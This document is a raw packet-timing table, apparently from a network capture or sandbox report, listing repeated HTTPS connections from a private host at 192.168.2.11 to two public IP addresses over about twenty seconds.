Jan 11, 2025 04:27:29.796664953 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:29.796704054 CET	443	50007	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:29.796777010 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:29.797018051 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:29.797032118 CET	443	50007	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:30.435035944 CET	443	50007	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:30.435098886 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:30.435627937 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:30.435633898 CET	443	50007	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:30.435806990 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:30.435820103 CET	443	50007	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:30.923437119 CET	443	50007	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:30.923547983 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:30.923794031 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:30.923840046 CET	443	50007	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:30.923928976 CET	50007	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:30.940370083 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:30.940402031 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:30.940473080 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:30.940690041 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:30.940702915 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.569741011 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.569811106 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.572289944 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.572302103 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.572439909 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.572446108 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.997544050 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.997600079 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.997611046 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.997622013 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.997667074 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.997667074 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.997673988 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.997697115 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:31.997715950 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.997791052 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.999106884 CET	50008	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:31.999125004 CET	443	50008	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:32.125123024 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.125160933 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:32.125360966 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.125468969 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.125474930 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:32.783560038 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:32.783646107 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.784389973 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:32.784452915 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.787867069 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.787873983 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:32.788136959 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:32.788285971 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.788976908 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:32.831340075 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:33.183239937 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:33.183454990 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:33.183470964 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:33.183518887 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:33.183634043 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:33.183703899 CET	443	50009	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:33.183756113 CET	50009	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:33.201766014 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:33.201808929 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:33.201880932 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:33.202238083 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:33.202258110 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:33.830549002 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:33.830768108 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:33.831442118 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:33.831474066 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:33.831554890 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:33.831562042 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:34.265412092 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:34.265481949 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:34.265537977 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:34.265548944 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:34.265574932 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:34.265656948 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:34.267333984 CET	50010	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:34.267355919 CET	443	50010	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:34.407152891 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:34.407221079 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:34.407392025 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:34.407686949 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:34.407710075 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.057316065 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.057472944 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.058096886 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.058542013 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.060194016 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.060221910 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.060468912 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.060830116 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.061052084 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.103337049 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.453797102 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.453871012 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.453938961 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.453938961 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.454022884 CET	50011	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:35.454047918 CET	443	50011	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:35.477520943 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:35.477560997 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:35.477632046 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:35.477849960 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:35.477857113 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.115616083 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.115704060 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.116276979 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.116282940 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.116471052 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.116476059 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.545172930 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.545286894 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.545305967 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.545350075 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.545394897 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.545442104 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.545445919 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.545491934 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.545531034 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.545531034 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.568073988 CET	50012	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:36.568099022 CET	443	50012	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:36.816925049 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:36.816976070 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:36.817043066 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:36.818660021 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:36.818669081 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:37.468024969 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:37.468162060 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:37.472330093 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:37.472336054 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:37.472584963 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:37.472589016 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:37.860544920 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:37.860625029 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:37.860739946 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:37.860815048 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:37.861174107 CET	50013	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:37.861187935 CET	443	50013	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:37.907582998 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:37.907622099 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:37.910856009 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:37.911103964 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:37.911111116 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:38.567725897 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:38.567812920 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:38.568301916 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:38.568310976 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:38.568459988 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:38.568466902 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:39.004370928 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:39.004451036 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:39.004456997 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:39.004491091 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:39.004501104 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:39.004528046 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:39.004538059 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:39.004549980 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:39.004581928 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:39.004605055 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:39.005155087 CET	50014	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:39.005172968 CET	443	50014	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:39.128005028 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:39.128065109 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:39.128134966 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:39.128489017 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:39.128504038 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:39.776593924 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:39.777002096 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:39.777565002 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:39.777565002 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:39.777575970 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:39.777592897 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:40.159962893 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:40.160022020 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:40.160047054 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:40.160058022 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:40.160100937 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:40.160151958 CET	50015	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:40.160168886 CET	443	50015	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:40.182261944 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:40.182305098 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:40.182384014 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:40.182650089 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:40.182663918 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:40.833622932 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:40.833699942 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:40.834122896 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:40.834127903 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:40.834271908 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:40.834275961 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:41.267286062 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:41.267371893 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:41.267431974 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:41.267438889 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:41.267462015 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:41.267509937 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:41.271135092 CET	50016	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:41.271158934 CET	443	50016	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:41.391061068 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:41.391130924 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:41.391217947 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:41.391498089 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:41.391514063 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:42.118128061 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:42.118217945 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.118761063 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.118767977 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:42.118910074 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.118913889 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:42.603878975 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:42.603970051 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:42.604005098 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.604038954 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.604183912 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.604196072 CET	443	50017	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:42.604216099 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.604243040 CET	50017	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:42.616889000 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:42.616910934 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:42.616977930 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:42.617161989 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:42.617176056 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.293791056 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.293857098 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.294286013 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.294294119 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.294430017 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.294435024 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.723786116 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.723859072 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.723923922 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.723931074 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.724850893 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.724879026 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.724894047 CET	443	50018	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:43.724904060 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.725286961 CET	50018	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:43.844206095 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:43.844263077 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:43.844327927 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:43.844594002 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:43.844614983 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:44.492188931 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:44.492249012 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:44.492779016 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:44.492794037 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:44.492938995 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:44.492944956 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:44.891478062 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:44.891562939 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:44.891608953 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:44.891628981 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:44.891793966 CET	50019	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:44.891812086 CET	443	50019	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:44.907058954 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:44.907105923 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:44.907196999 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:44.907447100 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:44.907459974 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:45.536442041 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:45.536514044 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:45.537070990 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:45.537079096 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:45.537131071 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:45.537136078 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:45.956387043 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:45.956463099 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:45.956525087 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:45.956576109 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:45.956576109 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:45.956842899 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:45.957415104 CET	50020	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:45.957436085 CET	443	50020	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:46.078188896 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:46.078227997 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:46.078512907 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:46.078699112 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:46.078710079 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:46.744653940 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:46.744807959 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:46.745326042 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:46.745338917 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:46.745503902 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:46.745511055 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:47.126104116 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:47.126296997 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:47.126329899 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:47.126543999 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:47.126841068 CET	50021	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:47.126858950 CET	443	50021	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:47.140333891 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:47.140368938 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:47.140446901 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:47.140758991 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:47.140772104 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:47.768347979 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:47.768486977 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:47.769047976 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:47.769054890 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:47.769223928 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:47.769228935 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:48.187387943 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:48.187463045 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:48.187525034 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:48.187549114 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:48.187549114 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:48.187823057 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:48.188102007 CET	50022	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:48.188117981 CET	443	50022	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:48.328526974 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:48.328573942 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:48.328672886 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:48.329013109 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:48.329024076 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:48.962436914 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:48.962517023 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:48.963237047 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:48.963237047 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:48.963243961 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:48.963259935 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:49.346435070 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:49.346507072 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:49.346544027 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:49.346628904 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:49.346765995 CET	50023	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:49.346779108 CET	443	50023	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:49.367336988 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:49.367389917 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:49.367562056 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:49.367786884 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:49.367806911 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.024853945 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.024983883 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.025593996 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.025602102 CET	443	50024	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:50.025866032 CET	50024	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:50.025872946 CET	443	50024	142.250.185.161	192.168.2.11
